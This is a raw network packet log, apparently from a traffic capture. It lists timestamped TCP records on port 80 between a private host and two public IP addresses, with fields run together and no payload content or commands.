                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.833470106 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.834042072 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.834139109 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.834189892 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.835282087 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.835422993 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.835606098 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.836199999 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.836252928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.836302996 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.837307930 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.837394953 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.837527990 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.838397980 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.838455915 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.838507891 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.839457989 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.839564085 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.839612007 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.840554953 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.840692043 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.840747118 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.841646910 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.841716051 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.841770887 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.842725039 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.842806101 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.842853069 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.843808889 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.843921900 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.844028950 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.844861984 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.844979048 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.845024109 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.845958948 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.846067905 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.846117973 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.847057104 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.847160101 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.847203970 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.848169088 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.848253012 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.848305941 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.849231005 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.849338055 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.849426031 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.850306988 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.850395918 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.850442886 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.851409912 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.851569891 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.851612091 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852241039 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852411985 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852411985 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852516890 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852526903 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852611065 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852783918 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852823019 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.852880955 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853065968 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853126049 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853172064 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853223085 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853557110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853656054 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.853701115 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854247093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854382992 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854445934 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854650021 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854756117 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.854799032 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.855374098 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856024981 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856090069 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856100082 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856637955 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856839895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856942892 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.856988907 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.857899904 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.858119965 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.858164072 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.859026909 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.859102011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.859234095 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.860316992 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.860363960 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.860410929 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.861190081 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.861243963 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.861291885 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.862273932 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.862334013 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.862385988 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.863342047 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.863406897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.863451004 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.864454031 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.864566088 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.864715099 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.865530014 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.865607977 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.865657091 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.866599083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.866738081 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.866791010 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.867722034 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.867880106 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.867924929 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.868753910 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.868931055 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.868980885 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.869900942 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.869971991 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.870018005 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.870965958 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.871059895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.871104002 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.872021914 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.872150898 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.872194052 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.873111963 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.873255014 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.873908997 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.874207020 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.874320030 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.874366999 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.875297070 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.875407934 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.875456095 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.876456976 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.876596928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.876665115 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.877469063 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.877583027 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.877629995 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.878561020 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.878658056 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.878705025 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.879632950 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.879749060 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.879792929 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.880705118 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.880799055 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.881287098 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.881901979 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.881980896 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.882026911 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.882891893 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.883017063 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.883064985 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.883969069 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.884068012 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.884140015 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.885255098 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.885415077 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.885468960 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.886140108 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.886250019 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.886311054 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.887222052 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.887345076 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.887393951 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.888283968 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893369913 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893452883 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893460989 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893536091 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893836975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.893898010 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.894078016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.894135952 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.894141912 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.894211054 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.895081043 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.895128012 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.895183086 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.895237923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.896095037 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.896207094 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.896269083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.897123098 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.897257090 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.897316933 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.898143053 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.898195982 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.898288012 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.899024963 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.899168968 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.899317980 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.899380922 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.900202990 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.900326967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.900382996 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.901211977 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.901269913 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.901279926 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.901437044 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.902396917 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.902410984 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.902466059 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.903264999 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.903326988 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.903357029 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.903390884 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.904819012 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.904845953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.904913902 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.904952049 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.905272961 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.905370951 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.905426025 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.905488014 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.906306028 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.906389952 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.906424999 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.906502008 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.907356024 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.907421112 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.907466888 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.907527924 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.908457994 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.908493996 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.908565044 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.909347057 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.909419060 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.909468889 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.910391092 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.910454988 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.910455942 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.910818100 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.911410093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.911509037 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.911569118 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.912389994 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.912446022 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.912504911 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.912564039 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.913425922 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.913541079 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.913546085 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.913873911 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.914434910 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.914536953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.914555073 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.914588928 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.915467978 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.915523052 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.915555000 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.915610075 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.916495085 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.916589975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.916665077 CET4980280192.168.2.4185.215.113.16
